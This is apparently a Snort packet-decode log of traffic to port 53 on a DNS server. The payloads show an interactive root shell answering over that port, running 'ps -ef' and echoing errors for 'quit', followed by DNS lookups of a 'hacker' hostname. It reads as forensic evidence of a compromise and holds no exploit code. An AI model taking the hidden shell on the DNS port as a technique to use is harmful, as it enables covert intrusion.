--interval 20 31 32 30 0A 72 6F 6F 74 20 20 20 20 20 20 20 120.root 38 33 32 20 20 20 20 20 31 20 20 30 20 4F 63 74 832 1 0 Oct 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 18 ? 00:0 30 3A 30 30 20 79 70 62 69 6E 64 0A 72 6F 6F 74 0:00 ypbind.root 20 20 20 20 20 20 20 38 33 34 20 20 20 38 33 32 834 832 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 0 Oct18 ? 20 20 20 30 30 3A 30 30 3A 30 30 20 79 70 62 69 00:00:00 ypbi 6E 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 33 nd.root 83 35 20 20 20 38 33 34 20 20 30 20 4F 63 74 31 38 5 834 0 Oct18 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A ? 00:00: 30 30 20 79 70 62 69 6E 64 0A 72 6F 6F 74 20 20 00 ypbind.root 20 20 20 20 20 38 33 38 20 20 20 38 33 34 20 20 838 834 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 32 20 79 70 62 69 6E 64 00:00:02 ypbind 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 38 34 20 .root 884 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 2F 75 73 72 2F 73 62 69 6E 2F 61 75 74 6F 6D /usr/sbin/autom 6F 75 6E 74 20 2D 2D 74 69 6D 65 6F 75 74 20 36 ount --timeout 6 30 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 38 39 0.root 889 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.555120 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48774 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47F9FB6 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972353 78346453 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.572890 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13899 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F9FB6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346457 136972353 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 1 0 Oct18 74 74 79 31 20 20 20 20 20 30 30 3A 30 30 3A 30 tty1 00:00:0 30 20 5B 6D 69 6E 67 65 74 74 79 5D 0A 72 6F 6F 0 [mingetty].roo 74 20 20 20 20 20 20 20 38 39 30 20 20 20 20 20 t 890 31 20 20 30 20 4F 63 74 31 38 20 74 74 79 32 20 1 0 Oct18 tty2 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6D 69 00:00:00 [mi 6E 67 65 74 74 79 5D 0A 72 6F 6F 74 20 20 20 20 ngetty].root 20 20 20 38 39 31 20 20 20 20 20 31 20 20 30 20 891 1 0 4F 63 74 31 38 20 74 74 79 33 20 20 20 20 20 30 Oct18 tty3 0 30 3A 30 30 3A 30 30 20 5B 6D 69 6E 67 65 74 74 0:00:00 [mingett 79 5D 0A 72 6F 6F 74 20 20 20 20 20 20 20 38 39 y].root 89 32 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 2 1 0 Oct18 20 74 74 79 34 20 20 20 20 20 30 30 3A 30 30 3A tty4 00:00: 30 30 20 5B 6D 69 6E 67 65 74 74 79 5D 0A 72 6F 00 [mingetty].ro 6F 74 20 20 20 20 20 20 20 38 39 33 20 20 20 20 ot 893 20 31 20 20 30 20 4F 63 74 31 38 20 74 74 79 35 1 0 Oct18 tty5 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6D 00:00:00 [m 69 6E 67 65 74 74 79 5D 0A 72 6F 6F 74 20 20 20 ingetty].root 20 20 20 20 38 39 34 20 20 20 20 20 31 20 20 30 894 1 0 20 4F 63 74 31 38 20 74 74 79 36 20 20 20 20 20 Oct18 tty6 30 30 3A 30 30 3A 30 30 20 5B 6D 69 6E 67 65 74 00:00:00 [minget 74 79 5D 0A 6E 6F 62 6F 64 79 20 20 20 20 33 35 ty].nobody 35 32 34 20 20 20 36 38 36 20 20 30 20 4F 63 74 32 24 686 0 Oct2 31 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 1 ? 00:00 3A 30 30 20 68 74 74 70 64 0A 6E 6F 62 6F 64 79 :00 httpd.nobody 20 20 20 20 33 35 32 35 20 20 20 36 38 36 20 20 3525 686 30 20 4F 63 74 32 31 20 3F 20 20 20 20 20 20 20 0 Oct21 ? 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 64 0A 00:00:00 httpd. 6E 6F 62 6F 64 79 20 20 20 20 33 35 32 36 20 20 nobody 3526 20 36 38 36 20 20 30 20 4F 63 74 32 31 20 3F 20 686 0 Oct21 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 68 74 74 70 64 0A 6E 6F 62 6F 64 79 20 20 20 20 httpd.nobody 33 35 32 37 20 20 20 36 38 36 20 20 30 20 4F 63 3527 686 0 Oc 74 32 31 20 3F 20 20 20 20 20 20 20 20 30 30 3A t21 ? 00: 30 30 3A 30 30 20 68 74 74 70 64 0A 6E 6F 62 6F 00:00 httpd.nobo 64 79 20 20 20 20 33 35 32 38 20 20 20 36 38 36 dy 3528 686 20 20 30 20 4F 63 74 32 31 20 3F 20 20 20 20 20 0 Oct21 ? 20 20 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 00:00:00 http 64 0A 6E 6F 62 6F 64 79 20 20 20 20 33 35 32 39 d.nobody 3529 20 20 20 36 38 36 20 20 30 20 4F 63 74 32 31 20 686 0 Oct21 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 ? 00:00:0 30 20 68 74 74 70 64 0A 6E 6F 62 6F 64 79 20 20 0 httpd.nobody 20 20 33 35 33 30 20 20 20 36 38 36 20 20 30 20 3530 686 0 4F 63 74 32 31 20 3F 20 20 20 20 20 20 20 20 30 Oct21 ? 0 30 3A 30 30 3A 30 30 20 68 74 74 70 64 0A 6E 6F 0:00:00 httpd.no 62 6F 64 79 20 20 20 20 33 35 33 33 20 20 20 36 body 3533 6 38 36 20 20 30 20 4F 63 74 32 31 20 3F 20 20 20 86 0 Oct21 ? 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 68 74 00:00:00 ht 74 70 64 0A 72 6F 6F 74 20 20 20 20 20 31 35 37 tpd.root 157 34 30 20 20 20 35 39 34 20 20 30 20 31 31 3A 35 40 594 0 11:5 37 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 7 ? 00:00 3A 30 30 20 2F 75 73 72 2F 73 62 69 6E 2F 73 73 :00 /usr/sbin/ss 68 64 0A 73 68 6C 61 6D 20 20 20 20 31 35 37 34 hd.shlam 1574 34 20 31 35 37 34 30 20 20 30 20 31 31 3A 35 37 4 15740 0 11:57 20 70 74 73 2F 30 20 20 20 20 30 30 3A 30 30 3A pts/0 00:00: 30 30 20 2D 74 63 73 68 0A 72 6F 6F 74 20 20 20 00 -tcsh.root 20 20 31 35 37 39 37 20 20 20 35 39 34 20 20 30 15797 594 0 20 31 32 3A 33 33 20 3F 20 20 20 20 20 20 20 20 12:33 ? 30 30 3A 30 30 3A 30 30 20 2F 75 73 72 2F 73 62 00:00:00 /usr/sb 69 6E 2F 73 73 68 64 0A 73 68 6C 61 6D 20 20 20 in/sshd.shlam 20 31 35 37 39 38 20 31 35 37 39 37 20 20 30 20 15798 15797 0 31 32 3A 33 33 20 70 74 73 2F 31 20 20 20 20 30 12:33 pts/1 0 30 3A 30 30 3A 30 30 20 2D 74 63 73 68 0A 72 6F 0:00:00 -tcsh.ro 6F 74 20 20 20 20 20 31 35 38 36 35 20 31 35 37 ot 15865 157 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.644803 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48779 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47FA3B6 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972360 78346457 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.644911 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x12A 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13900 IpLen:20 DgmLen:284 DF ***AP*** Seq: 0xA47FA3B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346464 136972360 39 38 20 20 30 20 31 32 3A 33 38 20 70 74 73 2F 98 0 12:38 pts/ 31 20 20 20 20 30 30 3A 30 30 3A 30 30 20 2D 62 1 00:00:00 -b 69 6E 2F 74 63 73 68 0A 72 6F 6F 74 20 20 20 20 in/tcsh.root 20 31 35 38 38 38 20 20 20 20 20 31 20 20 30 20 15888 1 0 31 32 3A 33 39 20 3F 20 20 20 20 20 20 20 20 30 12:39 ? 0 30 3A 30 30 3A 30 30 20 2F 62 69 6E 2F 73 68 0A 0:00:00 /bin/sh. 72 6F 6F 74 20 20 20 20 20 31 35 38 39 31 20 31 root 15891 1 35 38 36 35 20 20 30 20 31 32 3A 34 30 20 70 74 5865 0 12:40 pt 73 2F 31 20 20 20 20 30 30 3A 30 30 3A 30 30 20 s/1 00:00:00 74 63 70 64 75 6D 70 20 2D 73 20 32 30 30 30 20 tcpdump -s 2000 2D 77 20 62 69 6E 64 64 75 6D 70 20 70 6F 72 74 -w binddump port 0A 72 6F 6F 74 20 20 20 20 20 31 35 38 39 37 20 .root 15897 31 35 38 38 38 20 20 30 20 31 32 3A 34 31 20 3F 15888 0 12:41 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 70 73 20 2D 65 66 0A ps -ef. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.664596 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48781 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C12 Ack: 0xA47FA49E Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972362 78346464 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.945238 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48786 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C12 Ack: 0xA47FA49E Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972490 78346464 71 75 69 74 0A quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.950050 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x63 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13901 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xA47FA49E Ack: 0xA7F89C17 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346595 136972490 2F 62 69 6E 2F 73 68 3A 20 71 75 69 74 3A 20 63 /bin/sh: quit: c 6F 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 ommand not found 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:03.973148 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48789 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C17 Ack: 0xA47FA4BF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972493 78346595 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.154447 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48794 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C17 Ack: 0xA47FA4BF Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972610 78346595 71 75 69 74 0A quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.156361 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x63 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13902 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xA47FA4BF Ack: 0xA7F89C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346715 136972610 2F 62 69 6E 2F 73 68 3A 20 71 75 69 74 3A 20 63 /bin/sh: quit: c 6F 6D 6D 61 6E 64 20 6E 6F 74 20 66 6F 75 6E 64 ommand not found 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.184881 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48797 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C1C Ack: 0xA47FA4E0 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972613 78346715 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.929413 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x47 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48802 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA7F89C1C Ack: 0xA47FA4E0 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972687 78346715 65 78 69 74 0A exit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.930542 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13903 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xA47FA4E0 Ack: 0xA7F89C21 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346792 136972687 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.930215 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48804 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C21 Ack: 0xA47FA4E1 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972688 78346792 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.931195 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48805 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xA7F89C21 Ack: 0xA47FA4E1 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972688 78346792 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:05.931219 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13904 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47FA4E1 Ack: 0xA7F89C22 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346793 136972688 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:10.084786 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x62 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18298 IpLen:20 DgmLen:84 Len: 64 5E D0 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 03 76 6D 78 06 68 6B 6E 74 65 63 03 .com.vmx.hkntec. 6E 65 74 00 00 01 00 01 net..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:10.086192 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x62 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18299 IpLen:20 DgmLen:84 Len: 64 5E D0 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 03 76 6D 78 06 68 6B 6E 74 65 63 03 .com.vmx.hkntec. 6E 65 74 00 00 01 00 01 net..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 51 packets. Breakdown by protocol: Action Stats: TCP: 44 (86.275%) ALERTS: 0 UDP: 7 (13.725%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================